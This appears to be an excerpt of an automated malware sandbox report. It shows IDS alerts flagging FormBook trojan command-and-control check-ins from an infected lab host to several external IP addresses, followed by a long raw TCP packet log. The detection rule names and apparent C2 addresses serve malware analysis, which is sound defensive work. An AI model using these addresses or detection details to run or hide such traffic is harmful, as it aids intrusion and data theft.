| 02/21/22-16:55:07.577281 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.11.20 | 1.1.1.1 |
| 02/21/22-16:55:12.986190 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable | | | 192.168.11.20 | 1.1.1.1 |
| 02/21/22-16:55:13.352896 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49834 | 80 | 192.168.11.20 | 154.214.67.115 |
                                                                                                                                                                                                                              02/21/22-16:55:13.352896TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983480192.168.11.20154.214.67.115
                                                                                                                                                                                                                              02/21/22-16:55:13.352896TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983480192.168.11.20154.214.67.115
                                                                                                                                                                                                                              02/21/22-16:55:25.911765TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              02/21/22-16:55:25.911765TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              02/21/22-16:55:25.911765TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984080192.168.11.2066.29.154.157
                                                                                                                                                                                                                              02/21/22-16:55:54.205998TCP1201ATTACK-RESPONSES 403 Forbidden804985034.102.136.180192.168.11.20
                                                                                                                                                                                                                              02/21/22-16:55:59.557225TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              02/21/22-16:55:59.557225TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              02/21/22-16:55:59.557225TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985280192.168.11.2045.195.115.71
                                                                                                                                                                                                                              02/21/22-16:56:05.268443TCP1201ATTACK-RESPONSES 403 Forbidden804985534.102.136.180192.168.11.20
                                                                                                                                                                                                                              02/21/22-16:56:10.341701ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.201.1.1.1
                                                                                                                                                                                                                              02/21/22-16:56:48.346356ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                                                                                                                                                                                                              02/21/22-16:56:57.580063TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986380192.168.11.20217.160.0.98
                                                                                                                                                                                                                              02/21/22-16:56:57.580063TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986380192.168.11.20217.160.0.98
                                                                                                                                                                                                                              02/21/22-16:56:57.580063TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986380192.168.11.20217.160.0.98
                                                                                                                                                                                                                              02/21/22-16:57:07.829157TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986580192.168.11.2066.29.154.157
                                                                                                                                                                                                                              02/21/22-16:57:07.829157TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986580192.168.11.2066.29.154.157
                                                                                                                                                                                                                              02/21/22-16:57:07.829157TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986580192.168.11.2066.29.154.157
                                                                                                                                                                                                                              02/21/22-16:57:25.887648TCP1201ATTACK-RESPONSES 403 Forbidden804986823.227.38.74192.168.11.20
                                                                                                                                                                                                                              02/21/22-16:57:31.304950ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                                                                                                                                                                                                              02/21/22-16:57:41.798185TCP1201ATTACK-RESPONSES 403 Forbidden804987034.102.136.180192.168.11.20
                                                                                                                                                                                                                              02/21/22-16:57:46.972162TCP2031453ET TROJAN FormBook CnC Checkin (GET)4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              02/21/22-16:57:46.972162TCP2031449ET TROJAN FormBook CnC Checkin (GET)4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              02/21/22-16:57:46.972162TCP2031412ET TROJAN FormBook CnC Checkin (GET)4987180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              02/21/22-16:57:52.668588TCP1201ATTACK-RESPONSES 403 Forbidden804987234.102.136.180192.168.11.20
                                                                                                                                                                                                                              02/21/22-16:58:15.919729ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.503871918 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.504034042 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.504084110 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.504297972 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.504548073 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.504714012 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.504749060 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.504981995 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.505239964 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.505573034 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.505619049 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.505841970 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.505880117 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.506051064 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.506087065 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.506238937 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.506314039 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.506499052 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.506539106 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.506686926 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.506711960 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.506731033 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.506931067 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.507478952 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.507704020 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.507750988 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.507905960 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.507934093 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.508162022 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.508352995 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.508574009 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.508622885 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.508656979 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.508830070 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.508909941 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.510102034 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.510327101 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.510373116 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.510544062 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.510648012 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.510684967 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.510693073 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.510848999 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.510909081 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.510946989 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.511063099 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.511234045 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.511279106 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.511394024 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.511430979 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.511600971 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.511637926 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.511874914 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.511912107 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.512062073 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.512155056 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.512305021 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.512345076 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.512515068 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.512530088 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.512561083 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.512655973 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.512676001 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.512891054 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513051033 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513091087 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513240099 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513277054 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513412952 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513501883 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513533115 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513597012 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513842106 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513869047 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.513886929 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514031887 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514061928 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514086962 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514238119 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514266014 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514492035 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514523029 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514672041 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514709949 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514859915 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.514894962 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.515146017 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.515171051 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.515328884 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.515367031 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.515549898 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.515568972 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.515589952 CET44349757142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.515686989 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:50:17.515866995 CET49757443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:51:30.154968023 CET4977980192.168.11.2079.110.48.188
                                                                                                                                                                                                                              Feb 21, 2022 16:51:30.155000925 CET4977980192.168.11.2079.110.48.188
                                                                                                                                                                                                                              Feb 21, 2022 16:51:30.329035997 CET804977979.110.48.188192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.197617054 CET4978180192.168.11.20154.23.172.38
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.362096071 CET8049781154.23.172.38192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.362330914 CET4978180192.168.11.20154.23.172.38
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.362416983 CET4978180192.168.11.20154.23.172.38
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.527017117 CET8049781154.23.172.38192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.528933048 CET8049781154.23.172.38192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.529011965 CET8049781154.23.172.38192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.529359102 CET4978180192.168.11.20154.23.172.38
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.529412031 CET4978180192.168.11.20154.23.172.38
                                                                                                                                                                                                                              Feb 21, 2022 16:51:35.693747997 CET8049781154.23.172.38192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.728795052 CET4978280192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.742547989 CET804978295.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.742737055 CET4978280192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.742798090 CET4978280192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.756557941 CET804978295.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.756628990 CET804978295.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.756668091 CET804978295.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.756983042 CET4978280192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.757030964 CET4978280192.168.11.2095.179.246.125
                                                                                                                                                                                                                              Feb 21, 2022 16:51:40.770807981 CET804978295.179.246.125192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:45.798116922 CET4978380192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:51:45.956343889 CET804978338.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:45.956590891 CET4978380192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:51:45.956650972 CET4978380192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:51:46.114512920 CET804978338.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:46.115190029 CET804978338.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:46.115261078 CET804978338.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:46.115727901 CET4978380192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:51:46.115830898 CET4978380192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:51:46.274692059 CET804978338.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.539107084 CET4978580192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.574374914 CET804978554.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.574568987 CET4978580192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.574671030 CET4978580192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.609724045 CET804978554.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.609776974 CET804978554.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.609812021 CET804978554.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.610093117 CET4978580192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.610132933 CET4978580192.168.11.2054.154.44.39
                                                                                                                                                                                                                              Feb 21, 2022 16:51:51.645119905 CET804978554.154.44.39192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.807872057 CET4978680192.168.11.20148.251.15.228
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.821557045 CET8049786148.251.15.228192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.821755886 CET4978680192.168.11.20148.251.15.228
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.821810007 CET4978680192.168.11.20148.251.15.228
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.835529089 CET8049786148.251.15.228192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.836203098 CET8049786148.251.15.228192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.836253881 CET8049786148.251.15.228192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.836288929 CET8049786148.251.15.228192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.836606979 CET4978680192.168.11.20148.251.15.228
                                                                                                                                                                                                                              Feb 21, 2022 16:52:01.836715937 CET4978680192.168.11.20148.251.15.228
                                                                                                                                                                                                                              Feb 21, 2022 16:52:17.023355961 CET4978880192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:52:17.121769905 CET8049788185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:17.122020006 CET4978880192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:52:17.122103930 CET4978880192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:52:17.222429991 CET8049788185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:17.623687983 CET4978880192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:52:17.762485027 CET8049788185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:18.492628098 CET8049788185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:18.492697001 CET8049788185.190.39.52192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:18.492872000 CET4978880192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:52:18.492907047 CET4978880192.168.11.20185.190.39.52
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.817287922 CET4979080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.827344894 CET804979034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.827519894 CET4979080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.827588081 CET4979080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.837658882 CET804979034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.997085094 CET804979034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.997145891 CET804979034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.997445107 CET4979080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:52:22.997508049 CET4979080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:52:23.309907913 CET4979080192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:52:23.319878101 CET804979034.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:28.442352057 CET4979180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:52:28.620316029 CET804979145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:28.620718002 CET4979180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:52:28.620803118 CET4979180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:52:28.798789978 CET804979145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:29.121156931 CET4979180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:52:29.171334982 CET804979145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:29.171403885 CET804979145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:29.171597958 CET4979180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:52:29.171665907 CET4979180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:52:29.299273014 CET804979145.195.115.71192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:29.299511909 CET4979180192.168.11.2045.195.115.71
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.169917107 CET4979280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.179958105 CET804979234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.180198908 CET4979280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.180299044 CET4979280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.190413952 CET804979234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.286969900 CET804979234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.287020922 CET804979234.102.136.180192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.287389994 CET4979280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:52:34.287430048 CET4979280192.168.11.2034.102.136.180
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.399447918 CET4980580192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.399471998 CET804980538.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.399504900 CET4980580192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.399516106 CET4980580192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.399697065 CET804980538.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.399707079 CET4980580192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.399755001 CET804980538.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.399843931 CET4980580192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.399897099 CET4980580192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.400028944 CET804980538.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.400186062 CET804980538.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.400191069 CET4980580192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.400367975 CET4980580192.168.11.2038.143.0.82
                                                                                                                                                                                                                              Feb 21, 2022 16:54:06.542138100 CET804980638.143.0.82192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.272299051 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.272366047 CET44349807142.250.185.174192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.272573948 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.432493925 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.432574987 CET44349807142.250.185.174192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.466808081 CET44349807142.250.185.174192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.466960907 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.466995955 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.467010975 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.470204115 CET44349807142.250.185.174192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.470413923 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.475384951 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.476231098 CET44349807142.250.185.174192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.476361990 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.485025883 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.528162003 CET44349807142.250.185.174192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.737159967 CET44349807142.250.185.174192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.737418890 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.737490892 CET44349807142.250.185.174192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.737636089 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.737730980 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.738450050 CET44349807142.250.185.174192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.738581896 CET44349807142.250.185.174192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.738599062 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.738701105 CET49807443192.168.11.20142.250.185.174
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.840161085 CET49808443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.840198994 CET44349808142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.840420961 CET49808443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.840945959 CET49808443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.840961933 CET44349808142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.866660118 CET44349808142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.866838932 CET49808443192.168.11.20142.250.185.161
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.868381023 CET44349808142.250.185.161192.168.11.20
                                                                                                                                                                                                                              Feb 21, 2022 16:54:14.868520975 CET49808443192.168.11.20142.250.185.161
